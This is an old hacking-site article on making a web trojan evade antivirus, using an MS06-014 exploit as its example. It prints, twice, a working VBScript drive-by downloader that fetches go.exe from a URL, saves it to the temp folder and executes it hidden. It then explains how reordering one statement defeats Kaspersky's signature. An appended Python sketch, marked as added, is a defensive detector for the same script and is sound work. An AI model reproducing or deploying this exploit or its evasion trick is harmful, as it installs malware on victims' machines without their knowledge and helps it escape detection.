Antivirus evasion methods for web trojans, using MS06-014 as an example

2006-07-31T00:00:00
ID MYHACK58:62200610805
Type myhack58
Reporter Anonymous
Modified 2006-07-31T00:00:00

Description

There are generally two ways to make a web trojan evade antivirus detection: one is encryption (Microsoft's own script encoder, or, better, encryption and decryption functions you write yourself); the other is to find the signature (specific characters or statement order) and change it. A friend said his web trojan was being detected by Kaspersky and he did not know what to do about it, so I will use MS06-014 as an example to pass on a tip. The original code:


<html> <script language="VBScript"> on error resume next dl = "<http://www.baidu.com/go.exe>" Set df = document. createElement("object") df. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft. XMLHTTP" Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6="GET" x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject("Scripting. FileSystemObject","") set tmp = F. GetSpecialFolder(2) fname1= F. BuildPath(tmp,fname1) S. open S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject("Shell. Application","") Q. ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!& lt;/title> </head><body> <center>You DO it!& lt;/center> </body></html>

The version that evades detection:



<html> <script language="VBScript"> on error resume next dl = "<http://www.baidu.com/go.exe>" Set df = document. createElement("object") df. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft. XMLHTTP" Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6="GET" x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject("Scripting. FileSystemObject","") set tmp = F. GetSpecialFolder(2) S. open fname1= F. BuildPath(tmp,fname1)

S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject("Shell. Application","") Q. ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!& lt;/title> </head><body> <center>You DO it!& lt;/center> </body></html>

As you can see, all I actually did was move the S.open statement to before the fname1 = F.BuildPath(tmp, fname1) statement, and that is enough to evade detection: it is exactly what defeats Kaspersky's signature detection for the file-stream code. Of course, when moving a statement you must pay attention to what that statement does in the code, otherwise an error will occur.
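From the detection side, the reordering described above only defeats a signature that depends on statement order. The Python sketch below is an added example, not code from the original page or from any antivirus product: it folds the string concatenation and looks for indicators taken from the script anywhere in the text, so both orderings get the same verdict. The indicator set, the function names and the reduced sample fragment are assumptions constructed for illustration.

```python
import re
# Indicators taken from the script on this page; each is searched for anywhere in the text.
INDICATORS = {
    "rds_dataspace_clsid": r"bd96c556-65a3-11d0-983a-00c04fc29e36",
    "adodb_stream": r"adodb\.stream",
    "save_to_file": r"\.savetofile\b",
    "shell_execute": r"\.shellexecute\b",
}
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')

def normalize(script):
    """Lower-case the script and fold `v = a1 & a2` built from string constants."""
    consts, out = {}, []
    for line in script.lower().splitlines():
        m = ASSIGN.match(line)
        if m:
            consts[m.group(1)] = m.group(2)
        m = CONCAT.match(line)
        if m:
            parts = [p.strip() for p in m.group(2).split("&")]
            if all(p in consts for p in parts):
                consts[m.group(1)] = "".join(consts[p] for p in parts)
                line = '%s = "%s"' % (m.group(1), consts[m.group(1)])
        out.append(line)
    return "\n".join(out)

def matched(script):
    text = normalize(script)
    return {name for name, rx in INDICATORS.items() if re.search(rx, text)}

def is_suspicious(script):
    # RDS.DataSpace object plus write-to-disk plus execute, in any order.
    return {"rds_dataspace_clsid", "save_to_file", "shell_execute"} <= matched(script)

# Constructed, non-functional fragment holding only the lines relevant here.
ORIGINAL = '''df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
fname1 = F.BuildPath(tmp, fname1)
S.open
S.savetofile fname1,2
Q.ShellExecute fname1,"","","open",0'''
# The reordering described above: S.open moved before the BuildPath line.
REORDERED = ORIGINAL.replace("fname1 = F.BuildPath(tmp, fname1)\nS.open",
                             "S.open\nfname1 = F.BuildPath(tmp, fname1)")
```

Because matching runs on normalized text and ignores position, a rule of this shape is unaffected by moving statements; it would still need a script decoder in front of it to handle the encryption approach the article mentions first.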